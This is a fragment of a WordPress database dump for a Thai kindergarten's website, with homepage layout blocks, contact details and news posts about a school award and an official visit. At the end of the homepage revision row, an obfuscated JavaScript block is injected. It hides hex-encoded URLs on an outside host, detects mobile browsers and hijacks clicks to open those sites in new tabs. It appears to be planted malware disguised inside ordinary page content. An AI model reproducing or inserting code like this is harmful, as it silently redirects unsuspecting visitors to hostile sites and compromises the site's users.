{\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:50:56','2025-06-27 08:50:56','',19,'http://watprato.ssk.in.th/?p=590',0,'revision','',0),
(592,1,'2025-07-14 10:01:04','2025-07-14 03:01:04','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":593,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/514482723_122235641372202781_8363919214239008783_n-1024x725.jpg\" alt=\"\" class=\"wp-image-593\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":595,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/514482723_122235641372202781_8363919214239008783_n-1-1024x725.jpg\" alt=\"\" class=\"wp-image-595\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":594,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/514643366_122235641408202781_8568098940146373880_n-1024x538.jpg\" alt=\"\" class=\"wp-image-594\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','กระทรวงศึกษาธิการ มอบเกียรติบัตรนี้เพื่อแสดงว่าโรงเรียนอนุบาลวัดพระโต_สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต ๑ สำนักงานคณะกรรมการการศึกษาขั้นพื้นฐาน ได้รับการคัดเลือกให้เป็นโรงเรียนต้นแบบ \"สุขาดี มีความสุข\" ประจำปี ๒๕๖๘','','publish','open','open','','%e0%b8%81%e0%b8%a3%e0%b8%b0%e0%b8%97%e0%b8%a3%e0%b8%a7%e0%b8%87%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%98%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2025-07-14 10:05:05','2025-07-14 03:05:05','',0,'http://watprato.ssk.in.th/?p=592',0,'post','',0),
(593,1,'2025-07-14 10:00:28','2025-07-14 03:00:28','','514482723_122235641372202781_8363919214239008783_n','','inherit','open','closed','','514482723_122235641372202781_8363919214239008783_n','','','2025-07-14 10:00:28','2025-07-14 03:00:28','',592,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/514482723_122235641372202781_8363919214239008783_n.jpg',0,'attachment','image/jpeg',0),
(594,1,'2025-07-14 10:00:52','2025-07-14 03:00:52','','514643366_122235641408202781_8568098940146373880_n','','inherit','open','closed','','514643366_122235641408202781_8568098940146373880_n','','','2025-07-14 10:00:52','2025-07-14 03:00:52','',592,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/514643366_122235641408202781_8568098940146373880_n.jpg',0,'attachment','image/jpeg',0),
(595,1,'2025-07-14 10:00:53','2025-07-14 03:00:53','','514482723_122235641372202781_8363919214239008783_n (1)','','inherit','open','closed','','514482723_122235641372202781_8363919214239008783_n-1','','','2025-07-14 10:00:53','2025-07-14 03:00:53','',592,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/514482723_122235641372202781_8363919214239008783_n-1.jpg',0,'attachment','image/jpeg',0),
(596,1,'2025-07-14 10:01:04','2025-07-14 03:01:04','<!-- wp:paragraph -->\n<p>มอบเกียรติบัตรนี้เพื่อแสดงว่าโรงเรียนอนุบาลวัดพระโต_สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต ๑</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>สำนักงานคณะกรรมการการศึกษาขั้นพื้นฐาน ได้รับการคัดเลือกให้เป็นโรงเรียนต้นแบบ \"สุขาดี มีความสุข\" ประจำปี ๒๕๖๘</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":593,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/514482723_122235641372202781_8363919214239008783_n-1024x725.jpg\" alt=\"\" class=\"wp-image-593\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":595,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/514482723_122235641372202781_8363919214239008783_n-1-1024x725.jpg\" alt=\"\" class=\"wp-image-595\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":594,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/514643366_122235641408202781_8568098940146373880_n-1024x538.jpg\" alt=\"\" class=\"wp-image-594\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','กระทรวงศึกษาธิการ','','inherit','closed','closed','','592-revision-v1','','','2025-07-14 10:01:04','2025-07-14 03:01:04','',592,'http://watprato.ssk.in.th/?p=596',0,'revision','',0),
(597,1,'2025-07-14 10:05:02','2025-07-14 03:05:02','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":593,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/514482723_122235641372202781_8363919214239008783_n-1024x725.jpg\" alt=\"\" class=\"wp-image-593\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":595,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/514482723_122235641372202781_8363919214239008783_n-1-1024x725.jpg\" alt=\"\" class=\"wp-image-595\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":594,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/514643366_122235641408202781_8568098940146373880_n-1024x538.jpg\" alt=\"\" class=\"wp-image-594\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','กระทรวงศึกษาธิการ มอบเกียรติบัตรนี้เพื่อแสดงว่าโรงเรียนอนุบาลวัดพระโต_สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต ๑ สำนักงานคณะกรรมการการศึกษาขั้นพื้นฐาน ได้รับการคัดเลือกให้เป็นโรงเรียนต้นแบบ \"สุขาดี มีความสุข\" ประจำปี ๒๕๖๘','','inherit','closed','closed','','592-revision-v1','','','2025-07-14 10:05:02','2025-07-14 03:05:02','',592,'http://watprato.ssk.in.th/?p=597',0,'revision','',0),
(598,1,'2025-07-14 10:11:48','2025-07-14 03:11:48','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":600,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516278598_122237076302202781_3530110155043035331_n-1024x769.jpg\" alt=\"\" class=\"wp-image-600\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":601,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517173392_122237076476202781_570074520042229863_n-1024x684.jpg\" alt=\"\" class=\"wp-image-601\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":605,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517408980_122237076290202781_2399483217391122872_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-605\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":602,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517721289_122237076404202781_2080327603048285591_n-1024x815.jpg\" alt=\"\" class=\"wp-image-602\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":603,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517984456_122237076458202781_7761333788282518884_n-1024x697.jpg\" alt=\"\" class=\"wp-image-603\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":604,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518069309_122237076422202781_5168176646363493549_n-1024x674.jpg\" alt=\"\" class=\"wp-image-604\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":606,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518245601_122237076614202781_1845369519904074883_n-1024x769.jpg\" alt=\"\" class=\"wp-image-606\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','วันที่ 7 กรกฏาคม 2568 โรงเรียนอนุบาลวัดพระโต ให้การต้อนรับคณะกรรมการจากสำนักงานคณะกรรมการการป้องกันและปราบปรามการทุจริตแห่งชาติ ประจำจังหวัดศรีสะเกษ','','publish','open','open','','%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88-7-%e0%b8%81%e0%b8%a3%e0%b8%81%e0%b8%8f%e0%b8%b2%e0%b8%84%e0%b8%a1-2568-%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99','','','2025-07-14 10:16:48','2025-07-14 03:16:48','',0,'http://watprato.ssk.in.th/?p=598',0,'post','',0),
